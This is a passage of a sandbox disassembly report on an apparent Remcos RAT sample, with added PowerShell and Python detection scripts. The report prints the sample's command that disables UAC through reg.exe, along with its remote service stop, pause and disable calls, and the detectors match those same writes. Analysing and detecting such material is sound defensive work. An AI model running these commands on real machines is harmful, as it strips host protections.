                        • Opcode ID: 73f4726c011166e6bdcb5754414c0ade346116ed487fada7dd59cfb8b2f8224a
                        • Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
                        • Opcode Fuzzy Hash: 73f4726c011166e6bdcb5754414c0ade346116ed487fada7dd59cfb8b2f8224a
                        • Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C
                        APIs
                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88
                        • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A38E,00000000), ref: 0041AC9C
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACA9
                        • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF0
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF3
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Service$CloseHandle$Open$ChangeConfigManager
                        • String ID:
                        • API String ID: 493672254-0
                        • Opcode ID: f3d4b447748c037b2dac55463b57a149c398f0d820f611c96b244fdc7ed94624
                        • Instruction ID: ed0bae8235b77a8e2b5b4951a925fd67a34dfbd091713fce30693036f81a5133
                        • Opcode Fuzzy Hash: f3d4b447748c037b2dac55463b57a149c398f0d820f611c96b244fdc7ed94624
                        • Instruction Fuzzy Hash: 84014E311452147BD6110B385C4DEFB3B5CDB42771F100317F925922D1EA68CD45B5EE
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: __alldvrm$_strrchr
                        • String ID: PkGNG
                        • API String ID: 1036877536-263838557
                        • Opcode ID: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
                        • Instruction ID: 0200e234d7a66e392568480c50467de0d06b46efb2a76a7ba0b74d69ca9a70f2
                        • Opcode Fuzzy Hash: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
                        • Instruction Fuzzy Hash: 57A166319843869FFB21CF58C8817AEBBA1FF25304F1441AFE9859B382C27D8951C75A
                        APIs
                        • GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                        • _free.LIBCMT ref: 0044824C
                        • _free.LIBCMT ref: 00448274
                        • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                        • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                        • _abort.LIBCMT ref: 00448293
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast$_free$_abort
                        • String ID:
                        • API String ID: 3160817290-0
                        • Opcode ID: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                        • Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
                        • Opcode Fuzzy Hash: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                        • Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD
                        APIs
                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
                        • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Service$CloseHandle$Open$ControlManager
                        • String ID:
                        • API String ID: 221034970-0
                        • Opcode ID: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
                        • Instruction ID: 651adf303b3d55a6ad93a9774d9c6d096703db2647e4265c62a250da7e042a32
                        • Opcode Fuzzy Hash: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
                        • Instruction Fuzzy Hash: 68F0C231541218ABD711AF25AC49EFF3B6CDF45BA2F000026FE0992192DB68CD4695E9
                        APIs
                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
                        • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
                        • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Service$CloseHandle$Open$ControlManager
                        • String ID:
                        • API String ID: 221034970-0
                        • Opcode ID: 94d93926ec858c5890fc603d54741d931e0eaafa3f6b468ff921a10e10d86c77
                        • Instruction ID: cdcae22f94af1ce7d279f83afe572816001e75aa845eac4345c2c81124f82824
                        • Opcode Fuzzy Hash: 94d93926ec858c5890fc603d54741d931e0eaafa3f6b468ff921a10e10d86c77
                        • Instruction Fuzzy Hash: 84F0C231501218ABD6116F259C49DFF3B6CDB45B62F40002AFE0996192EB38DD4595F9
                        APIs
                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC20
                        • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC34
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC41
                        • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC62
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC65
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Service$CloseHandle$Open$ControlManager
                        • String ID:
                        • API String ID: 221034970-0
                        • Opcode ID: 4f42f77feb4e09d2984437374767d6fba58dab4553ac710dbf5187c031f369c2
                        • Instruction ID: 1af6be829003de2eeb85b71d4b0cbdb2c911632148e7083bdbbda8586ff13133
                        • Opcode Fuzzy Hash: 4f42f77feb4e09d2984437374767d6fba58dab4553ac710dbf5187c031f369c2
                        • Instruction Fuzzy Hash: 2FF0F631501228BBD711AF25EC49DFF3B6CDB45B62F00002AFE0992192EB38CD4595F9
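The four service records above are the RAT's remote service-management commands. Read against the public Win32 constants (a fact, not something the report states): the `OpenServiceW` access masks `00000002`, `00000020` and `00000040` are `SERVICE_CHANGE_CONFIG`, `SERVICE_STOP` and `SERVICE_PAUSE_CONTINUE`; `ControlService` codes `1`, `2` and `3` are `SERVICE_CONTROL_STOP`, `SERVICE_CONTROL_PAUSE` and `SERVICE_CONTROL_CONTINUE`; and the third `ChangeServiceConfigW` argument `00000004` is `SERVICE_DISABLED`. The service name is operator-supplied at runtime and is not visible in the report (the name argument shows only as a pointer), and the `000000FF` arguments are left as the plugin printed them. The script below is an added example, not part of the report or of Remcos: it decodes call lines copied from these records into their symbolic meaning, then pulls the Service Control Manager events that a disable, stop or pause leaves in the System log. Function names and the `Hours` parameter are the example's own.

```powershell
# Added example (not from the Joe Sandbox report or from Remcos): decode the ADVAPI32
# service calls shown in the listing and look for the matching host evidence.

$ServiceAccess = @{ 0x0002 = 'SERVICE_CHANGE_CONFIG'; 0x0020 = 'SERVICE_STOP'; 0x0040 = 'SERVICE_PAUSE_CONTINUE' }
$ControlCodes  = @{ 1 = 'SERVICE_CONTROL_STOP'; 2 = 'SERVICE_CONTROL_PAUSE'; 3 = 'SERVICE_CONTROL_CONTINUE' }
$StartTypes    = @{ 0 = 'SERVICE_BOOT_START'; 1 = 'SERVICE_SYSTEM_START'; 2 = 'SERVICE_AUTO_START'
                    3 = 'SERVICE_DEMAND_START'; 4 = 'SERVICE_DISABLED' }

function ConvertTo-Int32Arg {
    # The plugin prints arguments as 8 hex digits or '?' when unknown; '?' becomes $null.
    param([string]$Text)
    if ($Text -match '^[0-9A-Fa-f]{1,8}$') { return [int]('0x' + $Text) }
    return $null
}

function ConvertFrom-ServiceCallLine {
    # Takes one "Name.ADVAPI32(arg,arg,...)" line as it appears in the report's APIs list.
    param([string]$Line)
    if ($Line -notmatch '^(?<api>\w+)\.ADVAPI32\((?<args>[^)]*)\)') { return $null }
    $api      = $Matches['api']
    $callArgs = $Matches['args'] -split ','
    switch ($api) {
        'OpenServiceW'         { $v = ConvertTo-Int32Arg $callArgs[2]; "$api requests $($ServiceAccess[$v])" }
        'ControlService'       { $v = ConvertTo-Int32Arg $callArgs[1]; "$api sends $($ControlCodes[$v])" }
        'ChangeServiceConfigW' { $v = ConvertTo-Int32Arg $callArgs[2]; "$api sets start type $($StartTypes[$v])" }
        default                { "$api (no decode defined)" }
    }
}

function Get-ServiceTamperingEvents {
    # The SCM logs start-type changes as System/7040 ("... was changed from ... to disabled")
    # and state transitions as System/7036 ("... entered the stopped/paused state").
    param([int]$Hours = 24)
    $filter = @{
        LogName      = 'System'
        ProviderName = 'Service Control Manager'
        Id           = 7040, 7036
        StartTime    = (Get-Date).AddHours(-$Hours)
    }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Where-Object { $_.Id -eq 7040 -or $_.Message -match 'stopped|paused' } |
        Select-Object TimeCreated, Id, Message
}

# Worked decode of the call lines from the four records above (shortened to the decoded arguments).
@(
    'OpenServiceW.ADVAPI32(00000000,00000000,00000002,?)',
    'ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000)',
    'OpenServiceW.ADVAPI32(00000000,00000000,00000020,?)',
    'ControlService.ADVAPI32(00000000,00000001,?)',
    'OpenServiceW.ADVAPI32(00000000,00000000,00000040,?)',
    'ControlService.ADVAPI32(00000000,00000002,?)',
    'ControlService.ADVAPI32(00000000,00000003,?)'
) | ForEach-Object { ConvertFrom-ServiceCallLine $_ }

# Host side: anything the operator disabled, stopped or paused in the last three days.
Get-ServiceTamperingEvents -Hours 72
```

Event 7040 is the durable artefact: a service flipped to `SERVICE_DISABLED` stays that way across reboots even after the RAT is removed, so compare the 7040 hits against the current `Get-Service | Where-Object StartType -eq Disabled` set when restoring the host. The 7036 text match assumes English event messages; on other locales filter on the event ID alone.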
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: PkGNG
                        • API String ID: 0-263838557
                        • Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                        • Instruction ID: 497cf8d2f4a88fd96e7f98feeb1d24cd381d204b534fd1f3fd6e485e43360072
                        • Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                        • Instruction Fuzzy Hash: EA413871A00704BFF324AF79CD41B5EBBA9EB88710F10862FF105DB681E7B999418788
                        APIs
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                        • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404DD2
                        • CloseHandle.KERNEL32(?), ref: 00404DDB
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Create$CloseEventHandleObjectSingleThreadWait
                        • String ID: PkGNG
                        • API String ID: 3360349984-263838557
                        • Opcode ID: 49fe4c89c4b53e0bfaa247814761066ed204ae0ee87e3a5f8c156f36cd8984b3
                        • Instruction ID: 465453d6db43d9529954589ba2efa69a6de0eb64d520c2048147815e962fb190
                        • Opcode Fuzzy Hash: 49fe4c89c4b53e0bfaa247814761066ed204ae0ee87e3a5f8c156f36cd8984b3
                        • Instruction Fuzzy Hash: 3E4192B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                        APIs
                        • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                        • Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                        • CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CloseCreateHandleSizeSleep
                        • String ID: XQG
                        • API String ID: 1958988193-3606453820
                        • Opcode ID: 38e21002b9c7a7665831af374e9118a36682828a780468fd2ba8ddd7b6ab83cd
                        • Instruction ID: 2d5b847f40b6dc6d65e682cb961bc0859910b41d7418e35cc132b68a4a9af338
                        • Opcode Fuzzy Hash: 38e21002b9c7a7665831af374e9118a36682828a780468fd2ba8ddd7b6ab83cd
                        • Instruction Fuzzy Hash: AD112B30600740EEE631A7249895A5F3B6AEB41356F48083AF2C26B6D2C6799CA0C35E
                        APIs
                        • RegisterClassExA.USER32(00000030), ref: 0041D55B
                        • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                        • GetLastError.KERNEL32 ref: 0041D580
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ClassCreateErrorLastRegisterWindow
                        • String ID: 0$MsgWindowClass
                        • API String ID: 2877667751-2410386613
                        • Opcode ID: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                        • Instruction ID: 921741f364e14ac5d494c0d6481b3569f22aad0bbfd2e997b493b5423d792a6e
                        • Opcode Fuzzy Hash: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                        • Instruction Fuzzy Hash: 910129B1D00219BBDB00DFD5ECC49EFBBBDEA04355F40053AF900A6240E77859058AA4
                        APIs
                        • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
                        • CloseHandle.KERNEL32(?), ref: 004077AA
                        • CloseHandle.KERNEL32(?), ref: 004077AF
                        Strings
                        • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
                        • C:\Windows\System32\cmd.exe, xrefs: 00407796
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseHandle$CreateProcess
                        • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                        • API String ID: 2922976086-4183131282
                        • Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                        • Instruction ID: bcd6b2dc2297655d1c2a6c7a9d844aadd79638dc8707381bf3a952a3ff6736b4
                        • Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                        • Instruction Fuzzy Hash: BCF03676D4029D76CB20ABD6DC0EEDF7F7DEBC5B11F00056AF904A6141E6746404C6B9
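The function above spawns cmd.exe /k reg.exe ADD ... \Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, which switches off UAC (Admin Approval Mode) machine-wide at the next reboot; the value is not live until then, so the write is the thing to catch. The Python below is an added detection example, not part of this report and not code from the sample. It parses reg.exe ADD command lines (including the cmd.exe /k wrapper seen here) and also matches the same write when it arrives as a Sysmon registry-value event, which covers variants that call RegSetValueEx directly instead of reg.exe. The Sysmon-style field names and every event are constructed for the example; the "Contoso" key in the benign record is a placeholder.

```python
"""Detect the UAC-disable write the report shows, in two forms:
  * a process-creation event whose command line runs
    reg.exe ADD HKLM\...\Policies\System /v EnableLUA /t REG_DWORD /d 0
    (possibly wrapped in cmd.exe /k, as in the sample);
  * a Sysmon registry-value event (EID 13) for the same value.
All events below are constructed for this example (Sysmon-style field names)."""
import re
from dataclasses import dataclass
from typing import Optional

UAC_POLICY_KEY = r"software\microsoft\windows\currentversion\policies\system"
_TOKEN = re.compile(r'"[^"]*"|\S+')
_DWORD = re.compile(r"DWORD\s*\((0x[0-9A-Fa-f]+)\)")


@dataclass
class RegAdd:
    key: str
    value: Optional[str] = None
    reg_type: Optional[str] = None
    data: Optional[str] = None
    force: bool = False


def tokenize(cmdline: str) -> list[str]:
    """Split on whitespace while honouring double quotes. Backslashes are path
    separators on Windows, so shlex (which treats them as escapes) is avoided."""
    return [t.strip('"') for t in _TOKEN.findall(cmdline)]


def parse_reg_add(cmdline: str) -> Optional[RegAdd]:
    """Return the 'reg ADD' operation embedded anywhere in cmdline, or None."""
    toks = tokenize(cmdline)
    start = None
    for i, tok in enumerate(toks):
        base = tok.replace("/", "\\").rsplit("\\", 1)[-1].lower()
        if base in ("reg", "reg.exe") and i + 2 < len(toks) and toks[i + 1].lower() == "add":
            start = i + 2
            break
    if start is None:
        return None
    args = toks[start:]
    op = RegAdd(key=args[0])
    j = 1
    while j < len(args):
        sw = args[j].lower()
        if sw == "/f":
            op.force = True
            j += 1
        elif sw in ("/v", "/t", "/d") and j + 1 < len(args):
            setattr(op, {"/v": "value", "/t": "reg_type", "/d": "data"}[sw], args[j + 1])
            j += 2
        else:
            j += 1
    return op


def to_int(text: str) -> Optional[int]:
    """reg.exe accepts decimal, 0x-hex and zero-padded data; int(x, 0) rejects
    leading zeros, so fall back to explicit bases."""
    for base in (0, 10, 16):
        try:
            return int(text, base)
        except ValueError:
            continue
    return None


def is_uac_disable(op: RegAdd) -> bool:
    """True for EnableLUA=0 under HKLM\...\Policies\System (HKCU copies have no effect)."""
    key = op.key.replace("/", "\\").lower()
    return (key.startswith(("hklm\\", "hkey_local_machine\\"))
            and key.endswith(UAC_POLICY_KEY)
            and (op.value or "").lower() == "enablelua"
            and to_int(op.data or "") == 0)


def is_uac_disable_regset(target_object: str, details: str) -> bool:
    """Sysmon EID 13: TargetObject is the full value path, Details 'DWORD (0x...)'."""
    target = target_object.replace("/", "\\").lower()
    m = _DWORD.search(details)
    return target.endswith(UAC_POLICY_KEY + r"\enablelua") and m is not None and int(m.group(1), 16) == 0


def scan(events: list[dict]) -> list[tuple[str, str]]:
    """Return (rule, offending process) pairs for every UAC-disable write seen."""
    hits = []
    for ev in events:
        if ev.get("EventID") == 1:
            op = parse_reg_add(ev.get("CommandLine", ""))
            if op and is_uac_disable(op):
                hits.append(("EnableLUA=0 via reg.exe ADD", ev.get("ParentImage", ev.get("Image", ""))))
        elif ev.get("EventID") == 13 and is_uac_disable_regset(ev.get("TargetObject", ""), ev.get("Details", "")):
            hits.append(("EnableLUA=0 registry write", ev.get("Image", "")))
    return hits


SAMPLE_EVENTS = [  # constructed; only the first command line is taken from the report
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Users\user\AppData\Roaming\jdSldfVS.exe",
     "CommandLine": r"C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD "
                    r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"},
    {"EventID": 1, "Image": r"C:\Windows\System32\reg.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'reg.exe ADD "HKLM\Software\Contoso\App" /v Installed /t REG_DWORD /d 1 /f'},  # benign
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA",
     "Details": "DWORD (0x00000000)"},
]

if __name__ == "__main__":
    for rule, proc in scan(SAMPLE_EVENTS):
        print(f"{rule}: {proc}")
```

On a host where this fires, the value must be set back to 1 and the machine rebooted before UAC is enforced again; the registry-event rule is what catches builds that skip reg.exe and write the value through the API.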
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: SG$C:\Users\user\AppData\Roaming\jdSldfVS.exe
                        • API String ID: 0-966513011
                        • Opcode ID: aeb7ec08203138e6f15c389ffc7d883b5859742f8fda7ba0964a05b6f7ae7d1f
                        • Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
                        • Opcode Fuzzy Hash: aeb7ec08203138e6f15c389ffc7d883b5859742f8fda7ba0964a05b6f7ae7d1f
                        • Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E
                        APIs
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EF8), ref: 00405120
                        • SetEvent.KERNEL32(?), ref: 0040512C
                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00405137
                        • CloseHandle.KERNEL32(?), ref: 00405140
                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                        • String ID: KeepAlive | Disabled
                        • API String ID: 2993684571-305739064
                        • Opcode ID: 09248d073b904291628f2a82f92fe6a987867c86155402bef043dd91105bf09b
                        • Instruction ID: c1447ea2195e795a2fa4d382ed9a15925dec3dc8ccf256ab7d783030aa8980db
                        • Opcode Fuzzy Hash: 09248d073b904291628f2a82f92fe6a987867c86155402bef043dd91105bf09b
                        • Instruction Fuzzy Hash: 4CF06271904711BBDB103B758D0A66B7A54AB02311F0009BEF982916E2D6798840CF9A
                        APIs
                        • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CDED), ref: 0041CD62
                        • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD6F
                        • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CDED), ref: 0041CD7C
                        • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD8F
                        Strings
                        • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CD82
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Console$AttributeText$BufferHandleInfoScreen
                        • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                        • API String ID: 3024135584-2418719853
                        • Opcode ID: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                        • Instruction ID: 0b88db63cd78dea0703aeaf814a7171c31f7e2e6e0b1944ffb711cb25cf7542c
                        • Opcode Fuzzy Hash: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                        • Instruction Fuzzy Hash: B4E04872904315E7E31027B5EC4DDAB7B7CE745713B100266FA12915D39A749C40C6B5
                        APIs
                        • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                        • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressHandleModuleProc
                        • String ID: GetCursorInfo$User32.dll$`#v
                        • API String ID: 1646373207-1032071883
                        • Opcode ID: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                        • Instruction ID: 65f79b4a2c2aed896b4012a4b0ac893fb7d0ccba54e760513c8834f3bef68171
                        • Opcode Fuzzy Hash: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                        • Instruction Fuzzy Hash: B4B09B70541740E7CB106BF45C4F9153555B514703B105476B44996151D7B44400C61E
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 333ae2597f59f70c30e2a138da7d2dacca2148bf7cc6369c5742e0f4ac8aaabd
                        • Instruction ID: 3288ceb70b28299b768e57bc56a65f905b411dc47ae91625c595fe6b39b3afde
                        • Opcode Fuzzy Hash: 333ae2597f59f70c30e2a138da7d2dacca2148bf7cc6369c5742e0f4ac8aaabd
                        • Instruction Fuzzy Hash: 4D71C431900256ABEF21CF55C884AFFBBB5EF95350F14012BE812A72A1D7748CC1CBA9
                        APIs
                          • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
